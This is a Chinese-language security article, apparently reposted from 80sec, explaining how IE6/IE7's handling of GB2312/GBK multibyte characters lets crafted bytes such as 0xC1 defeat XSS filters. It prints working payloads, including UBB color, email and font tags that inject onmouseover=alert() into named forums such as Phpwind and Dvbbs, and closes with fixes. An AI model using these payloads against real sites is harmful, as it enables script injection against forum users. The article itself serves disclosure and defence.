如何分析字符集导致的浏览器跨站脚本?
|=———————————————————————————————–=||=—————–=[字符集导致的浏览器跨站脚本攻击]=—————–=|
|=———————————————————————————————–=|
|=————————————-=[Byjianxin]=————————————=|
|=——————————-=[jianxin@80sec.com]=—————————-=|
|=————————————————————————————————=|
文中<已经被替换为〈,如果需要文档,请访问http://www.80sec.com/release/charset-xss.txt
在一般的web程序里,显示数据给浏览器的时候都会指定一个字符集,在国内平时我们用到的字符集有utf-8,GBK,gb2312等等,字符集指示了浏览器该如何对待返回的数据。其中gb2312和GBK字符集使用得非常广泛,但是经证明,IE在处理这些宽字符集的时候存在问题,导致可能程序的一些安全规则被Bypass掉,引发严重的跨站脚本安全漏洞。在IE里,如果它遇到一个字符,它是指定字符集里的第一位的时候,就会认为其后续字符和当前字符构成一个合法的字符,这样它在解析包括html标签,处理javascript,Css时都会做如此考虑,测试版本为ie6和ie7。
1Bypass某些js的检查规则
〈HTML>
〈HEAD>
〈TITLE>80sectest〈/TITLE>
〈metahttp-equiv="Content-Type"content="text/html;charset=gb2312"/>
〈/HEAD>
〈BODY>
〈script>
window.onerror=function(){
alert('Vul');
returntrue;
}
〈/script>
〈script>x='〈?phpechochr(0xC1);?>';y='[User_IN_PUT]‘;〈/script>
〈/BODY>
〈/HTML>
这里即使是过滤了〈>'\等字符一样可以利用非法字符集序列来实现\的作用,因为它会把原来存在的'给结合掉,然后前面的'找不到闭合,后面[User_IN_PUT]就可以用来执行js代码了。
2Bypass某些属性的检查规则
为了避免直接使用html导致出现漏洞,一些论坛和程序使用了UBB标签,但是在gbk等多字节编码下,一样容易出现问题,以最容易出现问题的一个UBB标签为例子:
[color=xyz〈?phpechochr(0xC1);?>][/color][color=abconmouseover=alert(/xss/)s=〈?phpechochr(0xC1);?>]exploited[/color]
0xC1是一个gb2312的第一个字节,上面结果将会转化为:
〈fontcolor="xyz?>〈/font>〈fontcolor="abconmouseover=alert(/xss/)s=?>exploited〈/font>
其中的alert(/xss/)将会做一个事件执行,所以即使UBB标签也变得不安全,能饶过”的保护。许多论坛都没有注意这点,phpwind,动网等论坛就容易受到这种攻击。而Discuz通过在转换结果之后附加一个空格,修补了这一安全问题。这里使用到ubb标签其实有一个很有意思的tips在里面,因为有的数据库会抛弃与指定字符集不匹配的字符,所以必须借助后面的]等字符来形成一个有效的汉字才能存储到数据库里,当然像ACCESS这种就不会有问题了,另外一些语言在处理字符串的时候会强制字符串的字符集类型,不合法的字符会导致转码的失败或者遭到抛弃,所以也不能利用这种类型的攻击。
3几个小例子
Phpwind论坛charset跨站脚本漏洞
[email=xxxx羃[/email][email=xxxxonmouseover=alert()s=羃]FuckMe[/email]
[font=宋体;0xc1]xxx[/font][url=http://onmouseover=alert()//]xx[/url]
羃是一个特殊的十六进制编码和后面的]结合出来的字符,第一个种方法可以直接复制的:)
0xc1表示一个十六进制的字符编码
同样在dvbbs论坛也很容易产生一个xss代码如下
〈fontface="微软雅羃>xxxxxxxxxxx〈/font>〈fontface="onmouseover=alert()x=羃>xxxxxxxxxxx〈/font>
均在新版和老版测试通过。
4关于修复
对于程序设计者,由于UTF-8字符集的可靠性,不存在这个安全漏洞,所以大家在设计站点的时候可以考虑使用UTF-8字符集。
对于广大开发者,可以牢记最小输入等于最大安全的原则,在匹配正则的时候限制输入的字符的范围,尽量匹配ascii字符,如果必须使用中文,可以考虑类似于discuz的在中文后面添加空格修复该问题。
对于广大用户,这个漏洞由于浏览器处理页面字符的不同,可以考虑使用如Firefox浏览器,可以避免一部分这样的问题。
本站内容均为原创,转载请务必保留署名与链接!
字符集导致的浏览器跨站脚本攻击:http://www.80sec.com/charset-xss.html
本文地址:http://www.45fan.com/a/question/40135.html